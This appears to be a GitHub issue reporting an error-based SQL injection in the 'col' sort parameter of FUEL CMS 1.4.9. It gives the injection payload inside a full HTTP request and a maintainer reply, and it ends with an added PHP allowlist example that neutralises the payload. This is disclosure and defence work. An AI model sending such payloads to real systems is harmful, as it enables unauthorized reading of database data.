Environment
Version: 1.4.9
Vulnerability
Parameter Name: col
Parameter Type: GET
Attack Pattern: extractvalue(1,concat(char(126),(select/**/current_user())))
Step
step 1
step 2
```
GET /fuel/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=extractvalue(1,concat(char(126),(select/**/current_user())))&fuel_inline=0 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://127.0.0.1/fuel/pages
Cookie: ci_session=cfe42220d7540c849f2fdd72ddb732ff0e6addfb; fuel_74d00769f76d3dfc59096d1a4f6419d3=a%3A2%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22language%22%3Bs%3A7%3A%22english%22%3B%7D; fuel_ui_74d00769f76d3dfc59096d1a4f6419d3=%257B%2522leftnav_h3%2522%253A%25220%257C0%257C0%257C0%2522%252C%2522fuel_pages_items%2522%253A%2522list%2522%257D
```
fix: issue #562
c8d9381
Can you pinpoint the specific location of the code that causes the problem?
I've recently pushed an update to prevent DB SQL error messages from being displayed on production which should fix this issue on a production server.
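An added example, not part of the issue thread and not FUEL CMS code: a column name in `ORDER BY` cannot be passed as a bound parameter, so a sort parameter such as `col` can be matched against an allowlist before it reaches the query. The function name `safe_order_by` and the column list are assumptions for illustration.

```php
<?php
// Added example (not FUEL CMS code): allowlist validation for list-sorting
// parameters such as the `col` and `order` values in the reported request.

// Hypothetical list of sortable columns; a real module would list its own.
const SORTABLE_COLUMNS = ['id', 'location', 'layout', 'published'];

/**
 * Build an ORDER BY fragment from request parameters.
 * Anything that is not an exact allowlisted column name falls back to the
 * default column, so request text never becomes part of the SQL statement.
 */
function safe_order_by(array $query, string $defaultCol = 'id'): string
{
    $col   = $query['col'] ?? $defaultCol;
    $order = $query['order'] ?? 'asc';

    // Identifiers cannot be bound as prepared-statement parameters, so the
    // value must equal a known column name. The strict comparison also
    // rejects arrays (col[]=...) and other non-string input.
    if (!is_string($col) || !in_array($col, SORTABLE_COLUMNS, true)) {
        $col = $defaultCol;
    }

    // The direction is mapped onto one of two fixed keywords.
    $dir = (is_string($order) && strtolower($order) === 'desc') ? 'DESC' : 'ASC';

    return sprintf('ORDER BY `%s` %s', $col, $dir);
}

// Query string from the report above (sort parameters only), followed by a
// constructed benign request for comparison.
parse_str(
    'order=asc&col=extractvalue(1,concat(char(126),(select/**/current_user())))',
    $reported
);
parse_str('order=desc&col=location', $benign);

echo safe_order_by($reported), PHP_EOL; // reported value is not allowlisted
echo safe_order_by($benign), PHP_EOL;   // allowlisted column is used as given
```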